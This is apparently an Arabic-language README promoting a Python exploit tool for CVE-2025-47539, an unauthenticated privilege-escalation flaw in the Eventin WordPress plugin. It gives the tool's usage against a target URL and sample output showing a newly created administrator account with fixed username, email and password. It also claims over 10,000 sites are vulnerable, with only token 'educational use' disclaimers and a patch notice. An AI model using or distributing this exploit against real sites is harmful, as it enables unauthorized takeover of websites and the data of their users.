
Eventin <= 4.0.26 - نقص التفويض يؤدي إلى تصعيد الامتيازات بدون مصادقة
إضافة مدير الأحداث، تقويم الأحداث، التذاكر، التسجيلات – Eventin لـ WordPress معرضة لـ تصعيد صلاحيات دون مصادقة بسبب عدم وجود فحص تفويض في دالة import_items().
<= 4.0.26CVE-2025-475399.8 (Critical)May 7, 2025May 15, 2025يمكن للمهاجمين غير المصادق عليهم صياغة طلب خبيث إلى REST API وإنشاء مستخدم جديد بصلاحيات administrator دون أي تفاعل من المستخدم.
سكربت Python هذا هو أداة استغلال مستقلة لـ CVE-2025-47539.
سيقوم بـ:
⚠️ هذا السكربت مخصص للاستخدام التعليمي والتقييمات الأمنية الاحترافية فقط.
usage: a.py [-h] -u URL
Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g. http://target.com)
By:Nxploited (Khaled_alenazi) | [email protected]
[+] Exploitation succeeded
[+] Response:
{"message":"Successfully imported speaker"}
[+] Exploited Account Details
Name : Nxploited (Khaled_alenazi)
Email : [email protected]
Username : NxPloted
Password : nxploit123
Role : administrator
Exploit: By: Nxploited (Khaled_alenazi)
Use this script for educational purposes only. I am not responsible for your actions.
أكثر من 10,000+ موقع WordPress مؤكد أنها معرضة لهذا الاستغلال.
يجب على جميع مسؤولي المواقع الذين يستخدمون Eventin ≤ 4.0.26 التحديث فورًا إلى الإصدار 4.0.28 أو أحدث.
تُقدَّم هذه الأداة لأغراض تعليمية واختبار الاختراق المصرح به فقط.
المنشئ ليس مسؤولًا عن أي إساءة استخدام أو ضرر ناتج عن هذا السكربت.
بواسطة: Nxploited ( Khaled_Alenazi )
📧 للتواصل: [email protected]